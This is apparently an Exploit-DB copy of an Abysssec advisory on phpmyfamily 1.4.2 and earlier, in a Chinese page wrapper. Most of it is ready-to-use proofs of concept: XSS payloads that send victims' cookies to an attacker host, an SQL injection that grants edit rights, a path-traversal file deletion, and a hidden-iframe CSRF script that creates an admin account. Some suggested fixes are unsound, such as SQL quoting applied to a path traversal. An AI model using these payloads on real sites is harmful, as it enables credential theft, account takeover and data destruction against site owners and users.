扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 |
''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ http://www.exploit-db.com/moaub-17-phpmyfamily-multiple-remote-vulnerabilities/ ''' - Title: phpmyfamily Multiple Remote Vulnerabilities. - Affected Version : phpmyfamily<= 1.4.2 - VendorSite : http://www.phpmyfamily.net/ - Discovery : Abysssec.com - Description : =============== phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members to maintain a central database of research which is readily accessable and editable. By having a central repository, family members can contribute as and when information becomes available without requiring them to send it to a central 'custodian', or disseminate via email, and allows anecdotal information and possible leads to be shared. - Vulnerabilities: ================== 1)InformationDisclosure: -------------------------- 1-1)Directory listing: +POC: http://site.com/phpmyfamily/admin/ http://site.com/phpmyfamily/docs/ http://site.com/phpmyfamily/images/ http://site.com/phpmyfamily/inc/ http://site.com/phpmyfamily/lang/ http://site.com/phpmyfamily/styles/ +Fix: Create index.html in all folders. 1-2)Cookie Info: User's Cookie contions username and MD5 password. 2)XSS: ------ +Example Vulnerable Code: inc/passwdform.inc.php[line41-42] @$reason = $_REQUEST["reason"]; echo "<font color=\"red\">".$reason."</font>"; +POC: This poc send victim's cookie(contions username and MD5 password) to attacker site. http://SITE.com/phpmyfamily/inc/passwdform.inc.php?reason=<script>document.write("<img src='https://www.exploit-db.com/exploits/15029/hacker.com/c.php?cookie="+document.cookie +"'/>")</script> +other poc: a)census.php[line23-26] http://SITE.com/phpmyfamily/census.php?ref=<script>document.write("<img src='https://www.exploit-db.com/exploits/15029/hacker.com/c.php?cookie="+document.cookie +"'/>")</script> b)mail.php[line 25-35] http://SITE.com/phpmyfamily/mail.php?referer=<SCRIPT CODE> c)track.php[line 23-26] http://SITE.com/phpmyfamily/track.php?person=<SCRIPT CODE> d)people.php[line ] http://SITE.com/phpmyfamily/people.php?person=1>"><ScRiPt%20%0a%0d>alert(404385187829)%3B</ScRiPt> 3)Path Disclosure: -------------------------------------- +POC: http://SITE.com/phpmyfamily/admin.php?func=ged http://SITE.com/phpmyfamily/inc/gedcom.inc.php 4)SQL Injection: ------------- Code: :my.php[line 32-33] $query = "UPDATE ".$tblprefix."users SET email = '".$_POST["pwdEmail"]."' WHERE id = '".$_SESSION["id"]."'"; $result = mysql_query($query) or die(mysql_error()); +POC: http://SITE.com/phpmyfamily/my.php?func=email&pwdEmail=bbb@aa.com',edit='Y'%00 <form method="post" action="my.php?func=email"> <input type="text" name="pwdEmail" value="bbb@aa.com',edit='Y';%00"> <input type="submit" value="send"> </form> +Fix: use function quote_smart: $query = "UPDATE ".$tblprefix."users SET email = '".quote_smart($_POST["pwdEmail"])."' WHERE id = '".$_SESSION["id"]."'"; +other: track.php[line 145-148] http://SITE.com/phpmyfamily/track.php passthru.php [line 221-220] http://SITE.com/phpmyfamily/passthru.php and ... 5)Delete File: -------------- CMS's users can delete each file by this Vulnerability. +Code: passthru.php line[218-219] $docFile = "docs/".$_REQUEST["transcript"]; if (@unlink($docFile) || !file_exists($docFile)) +POC: http://SITE.com/phpmyfamily/passthru.php?func=delete&area=transcript&person=00002&transcript=../../../file.ext +Fix: use function quote_smart: $docFile = "docs/".quote_smart($_REQUEST["transcript"]); 6)XSRF: ------- +POC: <script> function creat_request(path,parameter,method){ method = method || "post"; var remote_dive = document.createElement('div'); remote_dive.id = 'Div_id'; var style = 'border:0;width:0;height:0;'; remote_dive.innerHTML = "<iframe name='iframename' id='iframeid' style='"+style+"'></iframe>"; document.body.appendChild(remote_dive); var form = document.createElement("form"); form.setAttribute("method", method); form.setAttribute("action", path); form.setAttribute("target", "iframename"); for(var key in parameter) { var hiddenField = document.createElement("input"); hiddenField.setAttribute("type", "hidden"); hiddenField.setAttribute("name", key); hiddenField.setAttribute("value", parameter[key]); form.appendChild(hiddenField); } document.body.appendChild(form); form.submit(); } creat_request('http://SITE.com/phpmyfamily/admin.php?func=add',{'pwdUser':'aaaa','pwdEmail':'aa%40sss.com','pwdPwd1':'123','pwdPwd2':'123','pwdEdit':'on','pwdRestricted':'1910-01-01','pwdStyle':'default','Create':'Submit+Query'}); </script> |
体验盒子
